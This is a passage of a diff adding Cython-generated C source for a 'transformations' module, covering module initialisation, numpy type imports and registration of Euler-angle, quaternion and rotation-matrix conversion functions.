__pyx_empty_bytes); if (unlikely(!__pyx_codeobj__41)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} +/* #### Code section: init_constants ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitConstants(void) { + if (__Pyx_CreateStringTabAndInitStrings() < 0) __PYX_ERR(0, 1, __pyx_L1_error); + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_globals ### */ + +static CYTHON_SMALL_CODE int __Pyx_InitGlobals(void) { + /* AssertionsEnabled.init */ + __Pyx_init_assertions_enabled(); + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + /* NumpyImportArray.init */ + /* + * Cython has automatically inserted a call to _import_array since + * you didn't include one when you cimported numpy. To disable this + * add the line + * numpy._import_array + */ +#ifdef NPY_FEATURE_VERSION +#if !NO_IMPORT_ARRAY +if (unlikely(_import_array() == -1)) { + PyErr_SetString(PyExc_ImportError, "numpy.core.multiarray failed to import " + "(auto-generated because you didn't call 'numpy.import_array()' after cimporting numpy; " + "use 'numpy._import_array' to disable if you are certain you don't need it)."); +} +#endif +#endif + +if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 1, __pyx_L1_error) + + return 0; + __pyx_L1_error:; + return -1; +} +/* #### Code section: init_module ### */ + +static CYTHON_SMALL_CODE int __Pyx_modinit_global_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_export_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_init_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_type_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_variable_import_code(void); /*proto*/ +static CYTHON_SMALL_CODE int __Pyx_modinit_function_import_code(void); /*proto*/ + +static int __Pyx_modinit_global_init_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_global_init_code", 0); + /*--- Global init code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_variable_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_export_code", 0); + /*--- Variable export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_export_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_export_code", 0); + /*--- Function export code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_type_init_code(void) { + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_init_code", 0); + /*--- Type init code ---*/ + #if CYTHON_USE_TYPE_SPECS + __pyx_ptype_6common_15transformations_15transformations_LocalCoord = (PyTypeObject *) __Pyx_PyType_FromModuleAndSpec(__pyx_m, &__pyx_type_6common_15transformations_15transformations_LocalCoord_spec, NULL); if (unlikely(!__pyx_ptype_6common_15transformations_15transformations_LocalCoord)) __PYX_ERR(0, 115, __pyx_L1_error) + if (__Pyx_fix_up_extension_type_from_spec(&__pyx_type_6common_15transformations_15transformations_LocalCoord_spec, __pyx_ptype_6common_15transformations_15transformations_LocalCoord) < 0) __PYX_ERR(0, 115, __pyx_L1_error) + #else + __pyx_ptype_6common_15transformations_15transformations_LocalCoord = &__pyx_type_6common_15transformations_15transformations_LocalCoord; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + #endif + #if !CYTHON_USE_TYPE_SPECS + if (__Pyx_PyType_Ready(__pyx_ptype_6common_15transformations_15transformations_LocalCoord) < 0) __PYX_ERR(0, 115, __pyx_L1_error) + #endif + #if PY_MAJOR_VERSION < 3 + __pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_print = 0; + #endif + #if !CYTHON_COMPILING_IN_LIMITED_API + if ((CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP) && likely(!__pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_dictoffset && __pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_getattro == PyObject_GenericGetAttr)) { + __pyx_ptype_6common_15transformations_15transformations_LocalCoord->tp_getattro = __Pyx_PyObject_GenericGetAttr; + } + #endif + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_LocalCoord, (PyObject *) __pyx_ptype_6common_15transformations_15transformations_LocalCoord) < 0) __PYX_ERR(0, 115, __pyx_L1_error) + #if !CYTHON_COMPILING_IN_LIMITED_API + if (__Pyx_setup_reduce((PyObject *) __pyx_ptype_6common_15transformations_15transformations_LocalCoord) < 0) __PYX_ERR(0, 115, __pyx_L1_error) + #endif + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_type_import_code(void) { + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__Pyx_modinit_type_import_code", 0); + /*--- Type import code ---*/ + __pyx_t_1 = PyImport_ImportModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_t_1)) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_7cpython_4type_type = __Pyx_ImportType_3_0_0(__pyx_t_1, __Pyx_BUILTIN_MODULE_NAME, "type", + #if defined(PYPY_VERSION_NUM) && PYPY_VERSION_NUM < 0x050B0000 + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #elif CYTHON_COMPILING_IN_LIMITED_API + sizeof(PyTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyTypeObject), + #else + sizeof(PyHeapTypeObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyHeapTypeObject), + #endif + __Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_7cpython_4type_type) __PYX_ERR(3, 9, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyImport_ImportModule("numpy"); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 202, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_ptype_5numpy_dtype = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "dtype", sizeof(PyArray_Descr), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArray_Descr),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_dtype) __PYX_ERR(2, 202, __pyx_L1_error) + __pyx_ptype_5numpy_flatiter = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flatiter", sizeof(PyArrayIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_flatiter) __PYX_ERR(2, 225, __pyx_L1_error) + __pyx_ptype_5numpy_broadcast = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "broadcast", sizeof(PyArrayMultiIterObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayMultiIterObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_broadcast) __PYX_ERR(2, 229, __pyx_L1_error) + __pyx_ptype_5numpy_ndarray = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ndarray", sizeof(PyArrayObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyArrayObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ndarray) __PYX_ERR(2, 238, __pyx_L1_error) + __pyx_ptype_5numpy_generic = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "generic", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_generic) __PYX_ERR(2, 812, __pyx_L1_error) + __pyx_ptype_5numpy_number = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "number", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_number) __PYX_ERR(2, 814, __pyx_L1_error) + __pyx_ptype_5numpy_integer = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "integer", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_integer) __PYX_ERR(2, 816, __pyx_L1_error) + __pyx_ptype_5numpy_signedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "signedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_signedinteger) __PYX_ERR(2, 818, __pyx_L1_error) + __pyx_ptype_5numpy_unsignedinteger = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "unsignedinteger", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_unsignedinteger) __PYX_ERR(2, 820, __pyx_L1_error) + __pyx_ptype_5numpy_inexact = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "inexact", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_inexact) __PYX_ERR(2, 822, __pyx_L1_error) + __pyx_ptype_5numpy_floating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "floating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_floating) __PYX_ERR(2, 824, __pyx_L1_error) + __pyx_ptype_5numpy_complexfloating = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "complexfloating", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_complexfloating) __PYX_ERR(2, 826, __pyx_L1_error) + __pyx_ptype_5numpy_flexible = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "flexible", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_flexible) __PYX_ERR(2, 828, __pyx_L1_error) + __pyx_ptype_5numpy_character = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "character", sizeof(PyObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyObject),__Pyx_ImportType_CheckSize_Warn_3_0_0); if (!__pyx_ptype_5numpy_character) __PYX_ERR(2, 830, __pyx_L1_error) + __pyx_ptype_5numpy_ufunc = __Pyx_ImportType_3_0_0(__pyx_t_1, "numpy", "ufunc", sizeof(PyUFuncObject), __PYX_GET_STRUCT_ALIGNMENT_3_0_0(PyUFuncObject),__Pyx_ImportType_CheckSize_Ignore_3_0_0); if (!__pyx_ptype_5numpy_ufunc) __PYX_ERR(2, 868, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_RefNannyFinishContext(); + return 0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_RefNannyFinishContext(); + return -1; +} + +static int __Pyx_modinit_variable_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_variable_import_code", 0); + /*--- Variable import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + +static int __Pyx_modinit_function_import_code(void) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__Pyx_modinit_function_import_code", 0); + /*--- Function import code ---*/ + __Pyx_RefNannyFinishContext(); + return 0; +} + + +#if PY_MAJOR_VERSION >= 3 +#if CYTHON_PEP489_MULTI_PHASE_INIT +static PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def); /*proto*/ +static int __pyx_pymod_exec_transformations(PyObject* module); /*proto*/ +static PyModuleDef_Slot __pyx_moduledef_slots[] = { + {Py_mod_create, (void*)__pyx_pymod_create}, + {Py_mod_exec, (void*)__pyx_pymod_exec_transformations}, + {0, NULL} +}; +#endif + +#ifdef __cplusplus +namespace { + struct PyModuleDef __pyx_moduledef = + #else + static struct PyModuleDef __pyx_moduledef = + #endif + { + PyModuleDef_HEAD_INIT, + "transformations", + 0, /* m_doc */ + #if CYTHON_PEP489_MULTI_PHASE_INIT + 0, /* m_size */ + #elif CYTHON_USE_MODULE_STATE + sizeof(__pyx_mstate), /* m_size */ + #else + -1, /* m_size */ + #endif + __pyx_methods /* m_methods */, + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_moduledef_slots, /* m_slots */ + #else + NULL, /* m_reload */ + #endif + #if CYTHON_USE_MODULE_STATE + __pyx_m_traverse, /* m_traverse */ + __pyx_m_clear, /* m_clear */ + NULL /* m_free */ + #else + NULL, /* m_traverse */ + NULL, /* m_clear */ + NULL /* m_free */ + #endif + }; + #ifdef __cplusplus +} /* anonymous namespace */ +#endif +#endif + +#ifndef CYTHON_NO_PYINIT_EXPORT +#define __Pyx_PyMODINIT_FUNC PyMODINIT_FUNC +#elif PY_MAJOR_VERSION < 3 +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" void +#else +#define __Pyx_PyMODINIT_FUNC void +#endif +#else +#ifdef __cplusplus +#define __Pyx_PyMODINIT_FUNC extern "C" PyObject * +#else +#define __Pyx_PyMODINIT_FUNC PyObject * +#endif +#endif + + +#if PY_MAJOR_VERSION < 3 +__Pyx_PyMODINIT_FUNC inittransformations(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC inittransformations(void) +#else +__Pyx_PyMODINIT_FUNC PyInit_transformations(void) CYTHON_SMALL_CODE; /*proto*/ +__Pyx_PyMODINIT_FUNC PyInit_transformations(void) +#if CYTHON_PEP489_MULTI_PHASE_INIT +{ + return PyModuleDef_Init(&__pyx_moduledef); +} +static CYTHON_SMALL_CODE int __Pyx_check_single_interpreter(void) { + #if PY_VERSION_HEX >= 0x030700A1 + static PY_INT64_T main_interpreter_id = -1; + PY_INT64_T current_id = PyInterpreterState_GetID(PyThreadState_Get()->interp); + if (main_interpreter_id == -1) { + main_interpreter_id = current_id; + return (unlikely(current_id == -1)) ? -1 : 0; + } else if (unlikely(main_interpreter_id != current_id)) + #else + static PyInterpreterState *main_interpreter = NULL; + PyInterpreterState *current_interpreter = PyThreadState_Get()->interp; + if (!main_interpreter) { + main_interpreter = current_interpreter; + } else if (unlikely(main_interpreter != current_interpreter)) + #endif + { + PyErr_SetString( + PyExc_ImportError, + "Interpreter change detected - this module can only be loaded into one interpreter per process."); + return -1; + } + return 0; +} +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *module, const char* from_name, const char* to_name, int allow_none) +#else +static CYTHON_SMALL_CODE int __Pyx_copy_spec_to_module(PyObject *spec, PyObject *moddict, const char* from_name, const char* to_name, int allow_none) +#endif +{ + PyObject *value = PyObject_GetAttrString(spec, from_name); + int result = 0; + if (likely(value)) { + if (allow_none || value != Py_None) { +#if CYTHON_COMPILING_IN_LIMITED_API + result = PyModule_AddObject(module, to_name, value); +#else + result = PyDict_SetItemString(moddict, to_name, value); +#endif + } + Py_DECREF(value); + } else if (PyErr_ExceptionMatches(PyExc_AttributeError)) { + PyErr_Clear(); + } else { + result = -1; + } + return result; +} +static CYTHON_SMALL_CODE PyObject* __pyx_pymod_create(PyObject *spec, PyModuleDef *def) { + PyObject *module = NULL, *moddict, *modname; + CYTHON_UNUSED_VAR(def); + if (__Pyx_check_single_interpreter()) + return NULL; + if (__pyx_m) + return __Pyx_NewRef(__pyx_m); + modname = PyObject_GetAttrString(spec, "name"); + if (unlikely(!modname)) goto bad; + module = PyModule_NewObject(modname); + Py_DECREF(modname); + if (unlikely(!module)) goto bad; +#if CYTHON_COMPILING_IN_LIMITED_API + moddict = module; +#else + moddict = PyModule_GetDict(module); + if (unlikely(!moddict)) goto bad; +#endif + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "loader", "__loader__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "origin", "__file__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "parent", "__package__", 1) < 0)) goto bad; + if (unlikely(__Pyx_copy_spec_to_module(spec, moddict, "submodule_search_locations", "__path__", 0) < 0)) goto bad; + return module; +bad: + Py_XDECREF(module); + return NULL; +} + + +static CYTHON_SMALL_CODE int __pyx_pymod_exec_transformations(PyObject *__pyx_pyinit_module) +#endif +#endif +{ + int stringtab_initialized = 0; + #if CYTHON_USE_MODULE_STATE + int pystate_addmodule_run = 0; + #endif + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannyDeclarations + #if CYTHON_PEP489_MULTI_PHASE_INIT + if (__pyx_m) { + if (__pyx_m == __pyx_pyinit_module) return 0; + PyErr_SetString(PyExc_RuntimeError, "Module 'transformations' has already been imported. Re-initialisation is not supported."); + return -1; + } + #elif PY_MAJOR_VERSION >= 3 + if (__pyx_m) return __Pyx_NewRef(__pyx_m); + #endif + /*--- Module creation code ---*/ + #if CYTHON_PEP489_MULTI_PHASE_INIT + __pyx_m = __pyx_pyinit_module; + Py_INCREF(__pyx_m); + #else + #if PY_MAJOR_VERSION < 3 + __pyx_m = Py_InitModule4("transformations", __pyx_methods, 0, 0, PYTHON_API_VERSION); Py_XINCREF(__pyx_m); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #elif CYTHON_USE_MODULE_STATE + __pyx_t_1 = PyModule_Create(&__pyx_moduledef); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1, __pyx_L1_error) + { + int add_module_result = PyState_AddModule(__pyx_t_1, &__pyx_moduledef); + __pyx_t_1 = 0; /* transfer ownership from __pyx_t_1 to transformations pseudovariable */ + if (unlikely((add_module_result < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + pystate_addmodule_run = 1; + } + #else + __pyx_m = PyModule_Create(&__pyx_moduledef); + if (unlikely(!__pyx_m)) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #endif + CYTHON_UNUSED_VAR(__pyx_t_1); + __pyx_d = PyModule_GetDict(__pyx_m); if (unlikely(!__pyx_d)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_d); + __pyx_b = PyImport_AddModule(__Pyx_BUILTIN_MODULE_NAME); if (unlikely(!__pyx_b)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_b); + __pyx_cython_runtime = PyImport_AddModule((char *) "cython_runtime"); if (unlikely(!__pyx_cython_runtime)) __PYX_ERR(0, 1, __pyx_L1_error) + Py_INCREF(__pyx_cython_runtime); + if (PyObject_SetAttrString(__pyx_m, "__builtins__", __pyx_b) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if CYTHON_REFNANNY +__Pyx_RefNanny = __Pyx_RefNannyImportAPI("refnanny"); +if (!__Pyx_RefNanny) { + PyErr_Clear(); + __Pyx_RefNanny = __Pyx_RefNannyImportAPI("Cython.Runtime.refnanny"); + if (!__Pyx_RefNanny) + Py_FatalError("failed to import 'refnanny' module"); +} +#endif + __Pyx_RefNannySetupContext("__Pyx_PyMODINIT_FUNC PyInit_transformations(void)", 0); + if (__Pyx_check_binary_version() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pxy_PyFrame_Initialize_Offsets + __Pxy_PyFrame_Initialize_Offsets(); + #endif + __pyx_empty_tuple = PyTuple_New(0); if (unlikely(!__pyx_empty_tuple)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_bytes = PyBytes_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_bytes)) __PYX_ERR(0, 1, __pyx_L1_error) + __pyx_empty_unicode = PyUnicode_FromStringAndSize("", 0); if (unlikely(!__pyx_empty_unicode)) __PYX_ERR(0, 1, __pyx_L1_error) + #ifdef __Pyx_CyFunction_USED + if (__pyx_CyFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_FusedFunction_USED + if (__pyx_FusedFunction_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Coroutine_USED + if (__pyx_Coroutine_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_Generator_USED + if (__pyx_Generator_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_AsyncGen_USED + if (__pyx_AsyncGen_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + #ifdef __Pyx_StopAsyncIteration_USED + if (__pyx_StopAsyncIteration_init(__pyx_m) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + /*--- Library function declarations ---*/ + /*--- Threads initialization code ---*/ + #if defined(WITH_THREAD) && PY_VERSION_HEX < 0x030700F0 && defined(__PYX_FORCE_INIT_THREADS) && __PYX_FORCE_INIT_THREADS + PyEval_InitThreads(); + #endif + /*--- Initialize various global constants etc. ---*/ + if (__Pyx_InitConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + stringtab_initialized = 1; + if (__Pyx_InitGlobals() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #if PY_MAJOR_VERSION < 3 && (__PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT) + if (__Pyx_init_sys_getdefaultencoding_params() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + if (__pyx_module_is_main_common__transformations__transformations) { + if (PyObject_SetAttr(__pyx_m, __pyx_n_s_name, __pyx_n_s_main) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + } + #if PY_MAJOR_VERSION >= 3 + { + PyObject *modules = PyImport_GetModuleDict(); if (unlikely(!modules)) __PYX_ERR(0, 1, __pyx_L1_error) + if (!PyDict_GetItemString(modules, "common.transformations.transformations")) { + if (unlikely((PyDict_SetItemString(modules, "common.transformations.transformations", __pyx_m) < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + } + } + #endif + /*--- Builtin init code ---*/ + if (__Pyx_InitCachedBuiltins() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Constants init code ---*/ + if (__Pyx_InitCachedConstants() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + /*--- Global type/function init code ---*/ + (void)__Pyx_modinit_global_init_code(); + (void)__Pyx_modinit_variable_export_code(); + (void)__Pyx_modinit_function_export_code(); + if (unlikely((__Pyx_modinit_type_init_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + if (unlikely((__Pyx_modinit_type_import_code() < 0))) __PYX_ERR(0, 1, __pyx_L1_error) + (void)__Pyx_modinit_variable_import_code(); + (void)__Pyx_modinit_function_import_code(); + /*--- Execution code ---*/ + #if defined(__Pyx_Generator_USED) || defined(__Pyx_Coroutine_USED) + if (__Pyx_patch_abc() < 0) __PYX_ERR(0, 1, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":21 + * + * import cython + * import numpy as np # <<<<<<<<<<<<<< + * cimport numpy as np + * + */ + __pyx_t_2 = __Pyx_ImportDottedModule(__pyx_n_s_numpy, NULL); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_np, __pyx_t_2) < 0) __PYX_ERR(0, 21, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":57 + * return g + * + * def euler2quat_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Quaternion q = euler2quat_c(e) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_1euler2quat_single, 0, __pyx_n_s_euler2quat_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__5)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 57, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_euler2quat_single, __pyx_t_2) < 0) __PYX_ERR(0, 57, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":62 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def quat2euler_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Vector3 e = quat2euler_c(q); + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_3quat2euler_single, 0, __pyx_n_s_quat2euler_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__7)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 62, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_quat2euler_single, __pyx_t_2) < 0) __PYX_ERR(0, 62, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":67 + * return [e(0), e(1), e(2)] + * + * def quat2rot_single(quat): # <<<<<<<<<<<<<< + * cdef Quaternion q = Quaternion(quat[0], quat[1], quat[2], quat[3]) + * cdef Matrix3 r = quat2rot_c(q) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_5quat2rot_single, 0, __pyx_n_s_quat2rot_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__9)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 67, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_quat2rot_single, __pyx_t_2) < 0) __PYX_ERR(0, 67, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":72 + * return matrix2numpy(r) + * + * def rot2quat_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Quaternion q = rot2quat_c(r) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_7rot2quat_single, 0, __pyx_n_s_rot2quat_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__11)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_rot2quat_single, __pyx_t_2) < 0) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":77 + * return [q.w(), q.x(), q.y(), q.z()] + * + * def euler2rot_single(euler): # <<<<<<<<<<<<<< + * cdef Vector3 e = Vector3(euler[0], euler[1], euler[2]) + * cdef Matrix3 r = euler2rot_c(e) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_9euler2rot_single, 0, __pyx_n_s_euler2rot_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__13)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 77, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_euler2rot_single, __pyx_t_2) < 0) __PYX_ERR(0, 77, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "common/transformations/transformations.pyx":82 + * return matrix2numpy(r) + * + * def rot2euler_single(rot): # <<<<<<<<<<<<<< + * cdef Matrix3 r = numpy2matrix(np.asfortranarray(rot, dtype=np.double)) + * cdef Vector3 e = rot2euler_c(r) + */ + __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_6common_15transformations_15transformations_11rot2euler_single, 0, __pyx_n_s_rot2euler_single, NULL, __pyx_n_s_common_transformations_transform_2, __pyx_d, ((PyObject *)__pyx_codeobj__15)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 82, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_rot2euler_single, __pyx_t_2) < 0) 